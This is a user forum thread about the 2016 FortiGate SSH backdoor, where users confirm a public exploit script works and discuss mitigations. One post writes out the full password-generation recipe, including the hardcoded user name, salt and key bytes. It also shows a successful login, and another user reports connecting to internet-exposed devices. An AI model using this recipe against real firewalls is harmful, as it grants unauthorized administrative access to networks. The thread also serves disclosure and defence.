SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
http://seclists.org/fulldisclosure/2016/Jan/26
I have not had a chance to try this. I don't see any threads discussing it. So, I thought I'd share.
is there any comments from Fortinet Technical team on it. very keen to know
the guy here in twitters confirms that he has the backdoor working
I have tried the script out there and have not been able to get it to work. Until we get some answer from Fortinet I'm going to keep at it.
Tried it on a 5.0.7 version and it works.
The script logs in without any password prompt
Confirming the script works. I just tested on a fresh FGVM running 5.0.6 and it logs automatically...
~/Desktop $ ./fgt_ssh_backdoor.py 192.168.100.200 FortiGate-VM64 # get sys status Version: FortiGate-VM64 v5.0,build0271,140124 (GA Patch 6) Virus-DB: 16.00560(2012-10-19 08:31) Extended DB: 1.00000(2012-10-17 15:46) IPS-DB: 4.00345(2013-05-23 00:39) IPS-ETDB: 0.00000(2001-01-01 00:00) Serial-Number: FGVMEV0000000000
I just did a quick search for FortiGates online running SSH and after 10 minutes was able to connect to 4... this is going to hurt some people methinks...
I noticed that there is no log saved for the actual SSH connection from the script. The only time I was able to see a log entry was when I changed the config (user: Fortimanager_Access).
Thanks for sharing Mike.
I've got mixed result. This one works:
Version: FortiGate-VM64 v5.0,build0128,121101 (GA)
But I was unable to access my FG-111C:
Fortigate-111C v4.0,build0639,120906 (MR3 Patch 10)
Don't know.. maybe it's because I did a downgrade from 5.2. Or they have different salts.
For those who don't want to dig too deep into this.
This is all the magic:
If you connect to SSH with the user 'Fortimanager_Access' you'll receive a challenge.
Then you can calculate the dynamic password based on this dword challenge:
n = $SSH_Challenge
m = $SHA1_Generator
m.add('\x00' * 12)
m.add(n + 'FGTAbc11*xy+Qqz27')
m.add('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
$Dynamic_Password = 'AK1' + base64.b64encode('\x00' * 12 + m.sha1digest())
Putty:
login as: Fortimanager_Access
Using keyboard-interactive authentication. -840056459
Access denied
Using keyboard-interactive authentication. -1914958026
Access denied
Using keyboard-interactive authentication. -1378285763
AK1AAAAAAAAAAAAAAAAmWT0TKGMI23Iq4Q9P42z0PwpYBQ=
FortiGate-VM64 #
This only works, if you have a SSH access. So by limiting the ip ranges for all admin users, you can mitigate the threat.
If you enable a ssh key it seems like it results in a fix . Can anybody confirm this on there FGT? ( upload a ssh key from the CLI and retest )
PCNSE
NSE
StrongSwan
Like this?
login as: admin Authenticating with public key "rsa-key-20160113"
FortiGate-VM64 # conf sys admin
FortiGate-VM64 (admin) # show
config system admin
edit "admin"
set accprofile "super_admin"
set vdom "root"
set ssh-public-key1 "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArnvrfeRc/Dp29mYq6Yp4YqHSYzvdsGiwvt5I+5PiQKACosqED4L6OApvXBtEsJz7XMJct9cADHxgajn2UrxDUxgjec3/4NVYkq9/jHm1X0y5MbgLb5X2ftDQNqM3gzO2vk6ZRCN9kyq4oCs0V2ynZYnjp8Q8/pRYAm/Y4DhE8s+SZKhDHNq6R3q4wc9IPWgAiWSGCsaPPGH2+3cYlvwQRDyva5RsWZPz4WhLm33A+/rl+4CBXY70mlPuXN3xvps 9IGTb0yYA0H03tfGbKxaQdEArFe4nh30b8gTZALtWJ3lNE1Y8oq3zVYrnfDIzmtNsCY/NnaSKi9bQMH0TcRjEUQ== rsa-key-20160113"
config dashboard-tabs
<snip>
end
config dashboard
<snip>
end
set password ENC AK1nds6rsH4pi3VuVI9jjtvaXR1fZjp5v8Stds1F03wrqA=
next
end
FortiGate-VM64 (admin) #
Still able to access with the FortiManager user.
Select Forum Responses to become Knowledge Articles!
Select the “Nominate to Knowledge Base” button to recommend a forum post to become a knowledge article.
User | Count |
---|---|
1736 | |
1107 | |
752 | |
447 | |
240 |
The Fortinet Security Fabric brings together the concepts of convergence and consolidation to provide comprehensive cybersecurity protection for all users, devices, and applications and across all network edges.
Copyright 2024 Fortinet, Inc. All Rights Reserved.